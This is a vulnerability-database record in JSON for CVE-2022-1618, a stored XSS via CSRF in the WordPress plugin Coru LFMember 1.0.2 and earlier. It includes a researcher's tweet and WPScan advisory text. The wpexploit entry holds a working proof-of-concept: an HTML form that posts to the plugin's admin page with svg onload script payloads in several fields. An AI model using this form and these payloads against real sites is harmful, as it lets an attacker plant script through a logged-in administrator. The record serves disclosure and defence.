This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.
{"id": "CVE-2022-1618", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2022-1618", "description": "This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.", "published": "2022-05-07T17:20:20", "modified": "2022-05-07T17:20:20", "epss": [], "cvss": {}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "candidate", "references": [], "cvelist": ["CVE-2022-1618"], "immutableFields": [], "lastseen": "2022-05-07T17:20:20", "viewCount": 22, "enchantments": {"twitter": {"counter": 2, "tweets": [{"link": "https://twitter.com/hunt3rsherlock/status/1524483158300708864", "text": "I\u2019ve identified Stored XSS via CSRF and a Stored XSS in 3 plugins of the WordPress.\nHere are my CVEs\nCVE-2022-1617\nCVE-2022-1512\nCVE-2022-1618\nhttps://t.co/Q4nXudFkAx\nhttps://t.co/qsHcP4I9eH\nhttps://t.co/1Pr6c9OCmS\nWhile, WP-Invoice has over 1000+ active installations.", "author": "hunt3rsherlock", "author_photo": "https://pbs.twimg.com/profile_images/1351525110713184256/KdvFnx-l_400x400.jpg"}]}, "score": {"value": 1.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:DDAFCAB2-B5DB-4839-8AE1-188383F4250D"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:DDAFCAB2-B5DB-4839-8AE1-188383F4250D"]}]}, "vulnersScore": 1.5}, "_state": {"twitter": 0, "score": 1691948408, "dependencies": 1691946178, "epss": 0}, "_internal": {"score_hash": "fea708c8d6e0894f14253f6374a1b44f"}, "cna_cvss": {}, "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {}, "extraReferences": [], "product_info": [], "solutions": [], "workarounds": [], "impacts": [], "problemTypes": [], "exploits": [], "assigned": "1976-01-01T00:00:00"}
{"wpvulndb": [{"lastseen": "2022-05-11T01:58:14", "description": "The plugin does not have CSRF check in place when adding a new game, and is lacking sanitisation as well as escaping in their settings, allowing attacker to make a logged in admin add an arbitrary game with XSS payloads\n\n### PoC\n", "cvss3": {}, "published": "2022-04-26T00:00:00", "type": "wpvulndb", "title": "Coru LFMember <= 1.0.2 - Stored Cross-Site Scripting via CSRF", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-1618"], "modified": "2022-05-08T07:01:16", "id": "WPVDB-ID:DDAFCAB2-B5DB-4839-8AE1-188383F4250D", "href": "https://wpscan.com/vulnerability/ddafcab2-b5db-4839-8ae1-188383f4250d", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2022-05-11T01:58:14", "description": "The plugin does not have CSRF check in place when adding a new game, and is lacking sanitisation as well as escaping in their settings, allowing attacker to make a logged in admin add an arbitrary game with XSS payloads\n", "cvss3": {}, "published": "2022-04-26T00:00:00", "type": "wpexploit", "title": "Coru LFMember <= 1.0.2 - Stored Cross-Site Scripting via CSRF", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-1618"], "modified": "2022-05-08T07:01:16", "id": "WPEX-ID:DDAFCAB2-B5DB-4839-8AE1-188383F4250D", "href": "", "sourceData": "<html>\r\n <body>\r\n <form action=\"http://wp.lab/wordpress/wp-admin/admin.php?page=coru_lfmember_admin&action=new\" method=\"POST\">\r\n <input type=\"hidden\" name=\"game_id\" value=\"\" />\r\n <input type=\"hidden\" name=\"game_image\" value='\"><svg/onload=alert(/XSS-Img/)>' />\r\n <input type=\"hidden\" name=\"game_name_short\" value='\"><svg/onload=alert(/XSS-Short/)>' />\r\n <input type=\"hidden\" name=\"game_name_long\" value='\"><svg/onload=alert(/XSS-Long/)>' />\r\n <input type=\"hidden\" name=\"game_description\" value=\"</textarea><svg/onload=alert(/XSS-desc/)>\" />\r\n <input type=\"hidden\" name=\"game_link\" value='\"><svg/onload=alert(/XSS-Link/)>' />\r\n <input type=\"hidden\" name=\"game_enabled\" value=\"0\" />\r\n <input type=\"hidden\" name=\"doaction_active\" value=\"Apply\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>", "cvss": {"score": 0.0, "vector": "NONE"}}]}